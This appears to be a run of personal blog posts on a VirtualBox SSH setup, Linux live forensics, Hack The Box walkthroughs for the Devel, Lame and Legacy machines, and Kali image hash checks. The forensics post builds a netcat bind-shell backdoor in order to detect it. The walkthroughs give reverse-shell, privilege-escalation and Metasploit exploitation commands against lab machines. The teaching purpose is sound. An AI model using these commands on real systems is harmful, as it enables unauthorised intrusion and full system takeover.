This blog entry shows how to connect to a Ubuntu VM via SSH from PowerShell with Windows 10 as a host.
Are you running Windows 10 as a host and want to connect to your Ubuntu VM? Are you using VirtualBox as a hosted hypervisor? If the answers to these questions are two yes, keep reading!
As you will see below, this technique is especially useful if you are using Ubuntu Server – which comes without a GUI – and want to avoid the pains of working on that terminal. For example, Page Up and Page Down didn’t work and the screen was too small. Even VirtualBox Guest Additions didn’t help solve the problem.
Here you find the list of steps from the creation of the VM to the SSH connection via PowerShell (the relative screenshots are under the list):
Create a Ubuntu VM on VirtualBox (I’m using VirtualBox 6.1.26).
Make sure that process sshd is running and listening on port 22 (s. Screenshot 1):
ps aux | grep sshd
sudo netstat -plant | grep :22
Power off the VM.
Open VirtualBox Manager, select the Ubuntu VM, and click on Settings. Click on Network, click on Advanced, click on Port Forwarding. Add a new port forwarding rule and click OK (s. Screenshot 2).
PS: The Guest IP field is empty. With Guest IP = 10.0.2.15 (find yours by typing ifconfig in the terminal of the VM), the connection didn’t work.
Start the VM again.
Launch PowerShell on your host and type: ssh pb@127.0.0.1 -p 10022
The first time you connect, PowerShell will ask if you are sure that you want to connect and show you the ECDSA key fingerprint. You can double check it by typing this in the VM terminal: ssh-keygen -l -f /etc/ssh/ssh_host_ecdsa_key.pub (s. Screenshot 3).
Enter yes.
Type again: ssh pb@127.0.0.1 -p 10022 (if it does not work, restart PowerShell).
Enter you Ubuntu password. You will now see the Ubuntu welcome message (s. Screenshot 4). Now you are connected to your Ubuntu VM via PowerShell from your Windows 10 host. Congratulations! 🙂
Screenshot 1: Check if process sshd is running and listening on port 22.
Screenshot 2: Set up port forwarding.
Screenshot 3: Check if the ECDSA key fingerprint matches.
Screenshot 4: This message means victory 🙂
I hope you liked this post. If you have any questions, feel free to leave a comment in the comment section. Never stop learning!
In this blog post, I will provide an introduction of how to do live forensics on a Linux machine by using default command line tools.
In this blog post, I will provide an introduction of how to do live forensics on a Linux machine by using default command line tools. If you wish to do the same on a Windows machine, I have got you covered: Endpoint Live Forensics from the Command Line on Windows. This blog post is heavily inspired by the 16-hour seminar “SOC Core Skills” by John Strand (Black Hills Information Security).
In order to understand the following steps, we need to know that everything on Linux is a file, even processes. Today, we will look into /proc, which is a directory that contains a folder for each running process. Each process has its own directory with virtual files within. Spoiler alert: We are going to analyze one of those files.
Create a backdoor and connect to it
Let’s start by setting up a malicious process on the Linux system. Firstly, we create a backdoor with netcat from a terminal tab and connect back to it from a second tab.
Terminal tab 1:
mknod backpipe p
/bin/bash 0<backpipe | nc -l 2222 1>backpipe
The first command creates a file of type device pipe called backpipe, whereas the second one starts a netcat listener on port 2222 that forwards all input through the backpipe and then into a bash session. It then takes the output of the bash session and puts it back into the netcat listener. Wait what? At first, I couldn’t visualize what this command did – yes, vision is strong with this one, so I played with it. The screenshot below visualizes how this backdoor works.
The unintended use of the backdoor killed it, but we can now see its inner working. My input, i.e., the command whoami, is rerouted to the input of bash which replies root and kills the listener.
Terminal tab 2:
nc 127.0.0.1 2222
In real life, you would use the IP address of the target machine instead of 127.0.0.1. This works in this situation, because the attacker and the victim machines are one and the same.
This is the intended use of the backdoor on the target (terminal tab 1). From a second tab, we connect to it. In a real attack, this second tab will be on the threat actor’s computer and will enable them to navigate and modify the target system.
Run analysis from the command line with default tools
Now everything is set up for the analysis. We open a third terminal tab, we switch to root, and list all the open connections with lsof -i -P1.
We list the open connections with lsof -i -P
This list shows two processes. PID 157 is the process running our backdoor (user: root), whereas PID 158 is the TCP connection to it, that is, the process launched from the second tab we opened (user: adhd). In a real world situation we would only the outbound connection from port 2222, because the inverse connection would be on the attacker’s machine. Next, we investigate PID 157 further by running lsof -p 157.
We investigate the possibly malicious PID 157 further.
This command lists all open files associated with this process. We can see that there is a named pipe2 called backpipe in the root folder and netcat is running from the bin directory. This is the first indication that netcat is currently running on the system. We can now go a step further and list the command that initialized these processes by running ps aux3.
List the commands that started the processes. If you look closely, you can see that I opened two terminal tabs (pts/2 where I started the listener and pts/1 where I connected back to the listener) and, after a break, opened a third one from which I’m running the analysis now.
The output of this command shows that there is a backdoor running on port 2222. From here, we take the last step and analyze the executable running process 157. We do this with the tool strings4 which confirms our suspicion that netcat was running within PID 157.
cd /proc/157
strings ./exe
In the output of strings run on exe, we see that netcat is definitely running on PID 157.
All in all, we were able to detect a fishy connection, find the PID behind it, list the command that invoked the corresponding process and analyze its executable using Linux built-in tools only.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!
Heath Adams challenged his students to get root on HTB Devel without using Meterpreter. I accepted that challenge and succeeded! This is the report of how I did it.
Heath Adams challenged his students to become root on HTB Devel without using Meterpreter1. I accepted that challenge and succeeded! This is the report of how I did it.
In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).
We first scan the target machine in order to identify open ports and services running behind those ports.
nmap -A -T4 -p- 10.10.10.5
The scan shows that the machine has two open ports:
FTP (21): We notice that anonymous FTP login is allowed. This tells us that we can upload files to the web server. Moreover, we can see some files here as well. It seems like it is a web root directory.
HTTP (80): We learn that the http-server-header is Microsoft IIS/7.5. If this were a pentest, this would be a finding as this is information disclosure. Moreover, we also get to know that the http-title is IIS7. This indicates that we are dealing with a default web-page.
The first thing we do for this enumeration is visiting the website 10.10.10.5.
10.10.10.5 shows a default web-page.
As our scan suggested, we are dealing with a default web-page. A default web-page indicates poor hygiene. What else did the website developer mess up? We look for extra directories by doing directory busting with DirBuster.
We brute-force directories on http://10.10.10.5:80 with DirBuster. We use the small list of lowercase words provided by Kali in /usr/share/wordlists/dirbuster and we look for asm, asmx, asp, aspx, txt, zip, bak, rar files.
DirBuster does not return anything interesting. The next step is to understand if we can execute files uploaded via FTP on the target. In order to do this, we first create a text file called test.txt on our Kali machine in which we write “test FTP”. Then, we connect to the target via FTP and upload this file. Now we navigate to 10.10.10.5/test.txt in the web-browser. Wow! We can see “test FTP” being displayed. This means that the server read our file and executed it.
Create test.txt with content “test FTP” on your Kali machine. Now enter the following commands in the Kali terminal (> separates the commands): ftp 10.10.10.5 > (enter username) anonymous > (enter password) anonymous > put test.txt . Then navigate to 10.10.10.5/test.txt and press Enter.
Exploit Devel with a Windows payload
In this section, our goal is to get a reverse shell through FTP. Firstly, we will create a Windows payload with Msfvenom2 and save it into an aspx file. Then we will upload this file to the Devel machine via FTP and, after having set up a listener with Netcat, execute it.
We save the Msfvenom payload list into venom-payloads.txt and grep this file for windows/shell3 payloads.
There are two payloads that are interesting for us: windows/shell/reverse_tcp and windows/shell_reverse_tcp. The first is a staged payload, whereas the second is a non-staged payload. The difference between the two is well-explained in this table:
This table was taken from Heath Adams’s “Practical Ethical Hacking”.
The staged payload did not get me in. For this reason, I will show you how to get a reverse shell by using the non-staged payload.
We create the payload and save it into ex_shell_ns.aspx :
We then load this file to the Devel Machine via FTP:
ftp 10.10.10.5
anonymous (This is the username)
anonymous (This is the password)
binary (Set the transfer type: Binary instead of ASCII)
put ex_shell_ns.aspx
We also open a new terminal tab and set up a listener with Netcat, where -n stands for numeric-only IP addresses, -v for verbose, -l for listen mode for inbound connects, and -p for local port number (in this case, port 4444):
nc -nvlp 4444
Finally, we open 10.10.10.5/ex_shell_ns.aspx in our browser and we get a shell!
After running our payload on the website server, we get a shell on the target machine. However, we are not root.
Unfortunately, we are not root on this machine yet.
Post-exploit enumeration and Windows privilege-escalation
In this section, our goal is to become root on the target machine. This action is called privilege-escalation, as we have a non-root shell already. Before running this attack, we need to do post-exploit enumeration in order to find a working exploit for this specific machine.
First, we get some information on the target machine.
This is a Windows 7 machine (version 6.1.7600) with x86 architecture. Let’s google “windows 7 (6.1 build 7600) exploit”. Among the results, this exploit is the most interesting: “An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges).” The only prerequisite is “low privilege access to the target OS”. No problem, we have this already. Let’s go ahead and use it.
We download the C source code to our Kali machine and save it as MS11-046.c and compile it as a 32-bit payload with mingw4:
Now we go back to our shell on the target and run MS11-046.exe :
We run \\<Your IPv4 address>\share\MS11-046.exe on the target and we become root.
We are now the root user on the machine Devel! Now you just have to find the two flags for users root and babis. I leave this task as a challenge for you.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!
In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).
In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).
Lame is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.
I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.
Open https://www.hackthebox.eu/home/machines and write down Lame’s IPv4 address. Next to the machine name, we see Tux the penguin and thus know right away that this is a Linux machine.
The first step for this hack is to scan the Lame machine in order to identify its open ports. We run nmap -A -T4 -p- 10.10.10.3
We scan for open ports and we get all the information available on the services that are running behind those ports.
The result shows us that there are five open ports and four services running behind them:
FTP (21): File Transfer Protocol. nmap shows that anonymous FTP login is allowed. This would be a finding if this were a penetration test. Anonymous FTP login should not be allowed in general. Using this information, we could connect to the machine via FTP and list the files in the FTP directory. Alternatively, we could check if vsFTPd version 2.3.4 is exploitable.
SSH (22): Secure Shell. We could try a brute force attack on SSH. If this were a penetration test, this would show us how good the password policy is and whether the blue team is able to detect us.
DISTCC (3632): I had to Google what DISTCC is. According to this post, this service “is designed to speed up compilation by taking advantage of unused processing power on other computers”. Here we could check whether DISTCC v1 is exploitable.
SMB (139/445): This is the service that we targeted in our attack on the Windows machine called Legacy. nmap shows that Lame is running Samba 3.0.20-Debian. This is the service that we will target today.
The result in the screenshot tells us that can list the share names without having a password, because anonymous login is allowed on SMB. This is a juicy finding. If we were able to get into ADMIN$, we would have very good chances of exploiting this machine. Run smbclient \\\\10.10.10.3\\ADMIN$
We cannot access the ADMIN share.
Unfortunately, access to this folder is denied (same result for print$ and opt$, whereas we can get access to IPS$ but we cannot neither ls nor cd). The remaining folder is tmp. Here we do not get access to vmware-root, and files .X0-lock and vgauthsvclog.txt.0 do not contain interesting information. PS: I downloaded these files on my machine with smbget -R smb://10.10.10.3/tmp, as cat didn’t work on SMB.
Now open your browser, go to Google and search samba 3.0.20-debian exploit. We open the Rapid7 page called usermap_script. This page explains that using the non-default “username map script” configuration option, we can specify a username containing shell meta characters and then execute arbitrary commands. Moreover, no authentication is needed. This is what we were looking for.
Exploit Lame and Catch the Flags
Enter use exploit/multi/samba/usermap_script , set rhosts 10.10.10.3 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!
We are root on Lame!
We are in! We are the root user on the machine Lame. Now you just have to find the two flags for users root and makis. I leave this task as a challenge for you.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!
In this blog post, I will show the steps that I took to get root access to the Legacy machine on Hack The Box (HTB).
In this blog post, I will show the steps that I took to get root access to the Legacy machine on Hack The Box (HTB).
Legacy is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.
I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.
Create a Connection to the HTB Network
In order to connect to the HTB network, open a terminal tab, go to the folder where you downloaded the connection pack, type openvpn <yourUsername>.ovpn. If you see the line Initialization Sequence Completed, you are good to go. Now open a new terminal tab and type ifconfig. You should see an entry called tun0, which is the name of the VPN interface. Write down the relative IPv4 address, we will need it later.
Scanning and Enumeration
In real life, the first step for a penetration test is information gathering. During this phase, the pentester gathers information about the target. Because we are hacking a machine on HTB, we will limit ourselves to write down Legacy’s operative system (Legacy is a Windows machine) and its IPv4 address. This information can be found at https://www.hackthebox.eu/home/machines under Retired Machines > Legacy.
The next step of the pentest process is scanning and enumeration. Here the pentester wants to know which ports on the victim machine are open, that is, which ports are configured to receive packets. Moreover, s/he looks at the services listening on those ports, looks for unpatched vulnerabilities and so on. For scanning and enumeration we are going to use nmap, smbclient (spoiler alert: we are going to exploit a SMB weakness) and metasploit.
Open a new terminal tab and enter nmap -T4 -p- 10.10.10.4 . With this command, we are going to scan all ports on machine 10.10.10.4 (Legacy) with timing 4 (timing is in range 0-5, where higher is faster).
We just look for open ports as first step.
This first scan tells us that ports 139/445 (SMB) and 3389 (RDP) are open. Now that we know this, let’s list more information about them. Enter nmap -A -T4 -p 139,445,3389 10.10.10.4 , where -A lists all the information available for each specified port.
Now we get more information for ports 139/445 and 3389.
The most important information that we get from this second scan is that the target computer is running Windows XP (you see this information under smb-os-discovery).
Now we will focus on SMB which is a network file sharing protocol that has been vulnerable on Windows in the past. Our goal is to gather information about SMB on this machine. The first thing we can do is try accessing SMB resources on the target. Enter smbclient -L \\\\10.10.10.4\\
Our goal is to access SMB file shares on Legacy.
This attempt was unsuccessful, because the login is protected by a password. The next thing we can try is to find out which SMB version Legacy is running. In order to do this, we will use Metasploit. Run msfconsole to start the service. Then enter search smb. As we are looking for the SMB version, we enter use auxiliary/scanner/smb/smb_version. Now we set up the remote host with set rhosts 10.10.10.4 and run this program.
We scan in order to find out the SMB version.
Unfortunately, we do not get any information about the SMB version, but we get to learn that the host is running Service Package 3 of Windows XP. This is an important finding, because it allows us to look for an exploit for a specific service pack.
Now open your browser, go to Google and search smb windows XP SP3 exploit. One of the first pages that show up is https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi . Rapid7 pages are very helpful as they explain the specific vulnerability and show you the commands that you have to run with Metasploit in order to exploit that vulnerability. The reason behind this “service” is that the Metasploit Project is a collaboration between the open source community and the company Rapid7.
Exploit Legacy and Catch the Flags
It is time to hack into Legacy. In this exploit, we are going to open a reverse shell. This means that the victim connects back to us (the attacker). This image by https://www.hackingtutorials.org/ visualizes this concept:
The idea behind a reverse shell.
Enter use exploit/windows/smb/ms08_067_netapi and then set up RHOST (the victim’s IP address) and LHOST (the attacker’s IP address). This step is very important as the default settings use your machine default IP address as LHOST (it took a while for me to find this problem), whereas you need the tun0 IPv4 addressin order to hack into Legacy successfully. Enter set rhosts 10.10.10.4 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!
The exploit was successful and we are now NT AUTHORITY\SYSTEM.
If everything worked fine, you should see something similar to the screenshot above. NT AUTHORITY\SYSTEM means that we now have the highest privilege level in Windows, which is equivalent to the root user in Linux. Next you have to look for user “john”‘s and user “Administrator”‘s flags and submit them on HTB in order to own the Legacy machine. I leave this task as a challenge for you.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!
You downloaded an image to install Kali Linux and you want to make sure that this file is an integral and authentic copy? This post is for you!
You have downloaded an image to install Kali Linux1 as a virtual machine (VM) on your hypervisor and you want to make sure that this file is an integral and authentic copy? If the answer to this question is yes, keep reading! In this blog entry, I will describe how to verify the integrity and authenticity of a Kali Linux OVA image with Windows 10.
There are two ways to install Kali Linux on a virtual machine. The first is to create a new VM and manually configure it on the hypervisor2. Once this is done, the Kali ISO image3 needs to be attached to the virtual CD-ROM and then the VM can be booted. The second method is to import a copy of an existing virtual machine into the hypervisor. Such copy is distributed as an OVA4 package, which is an archive file that contains metadata for the VM – such as name or hardware requirements – and at least one disk image, among other things. Before importing the OVA image into the hypervisor, we need to make sure that this file wasn’t damaged during the download and perhaps more importantly that this is an authentic copy. This process is what I present next.
The first step of this process is to download the OVA image. In order to do this, go the official website of Offensive Security5: https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/. Here you should choose the OVA image compatible with your hypervisor. As I use VirtualBox6, I downloaded the VirtualBox 64-bit file. While downloading, take note of the checksum (SHA256Sum) written next to the file that you selected:
OVA images and SHA256Sums on offensive-security.com
The next step is to open the Windows PowerShell and cd7 into the directory where you saved the OVA image. Here run the following command (modify it with the name of the file that you downloaded): Get-FileHash kali-linux-2020.3-vbox-amd64.ova -Algorithm sha256. If everything worked well, you should see something like this:
Get the hash from the OVA file
The alphanumeric string under the column Hash is the information we need to compare to the SHA256Sum that we took note of before in this tutorial. As I’m lazy – and thus efficient 😀 – I did this with the Python Shell (see Screenshot below; modify the command with your checksum data). If the result of running this command is True, you are ready to go8: